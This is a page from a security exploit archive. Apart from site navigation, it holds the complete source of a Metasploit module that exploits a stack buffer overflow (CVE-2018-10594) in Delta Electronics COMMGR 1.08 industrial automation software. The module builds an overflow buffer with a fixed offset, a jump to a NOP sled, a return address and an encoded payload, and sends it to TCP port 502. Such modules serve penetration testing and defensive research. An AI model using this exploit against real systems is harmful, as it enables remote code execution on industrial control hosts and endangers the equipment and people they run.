Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow: Posted Oct 8, 2018; Authored by t4rkd3vilz, hubertwslin | Site metasploit.com; This Metasploit module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This Metasploit module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1.; tags | exploit, overflow; systems | windows; advisories | CVE-2018-10594; SHA-256 | e4890d38f7e77e0fc47c8e04e33af1e27192fdc6cf14b35bc40478d30d87c47e; Download | Favorite | View

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
        crafted packets. This module has been tested successfully on Delta Electronics Delta
        Industrial Automation COMMGR 1.08 over
          Windows XP SP3,
          Windows 7 SP1, and
          Windows 8.1.
      },
      'Author'         =>
        [
          't4rkd3vilz',    # PoC
          'hubertwslin'    # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '44965'],
          [ 'CVE', '2018-10594']
        ],
      'Payload'        =>
        {
          'Space'          => 640,
          'DisableNops'    => true,
          'BadChars'       => "\x00"
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'COMMGR 1.08 / Windows Universal',
            {
              'Ret'    => 0x00401e14, # p/p/r COMMGR.exe
              'Offset' => 4164
            }
          ],
        ],
      'DisclosureDate' => 'Jul 02 2018',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(502)
      ])
  end

  def exploit
    data =  rand_text_alpha(target['Offset'])
    data << "\xeb\x27\x90\x90"    # jmp short $+27 to the NOP sled
    data << [target.ret].pack("V")
    data << make_nops(40)
    data << payload.encoded

    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

Share This

Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems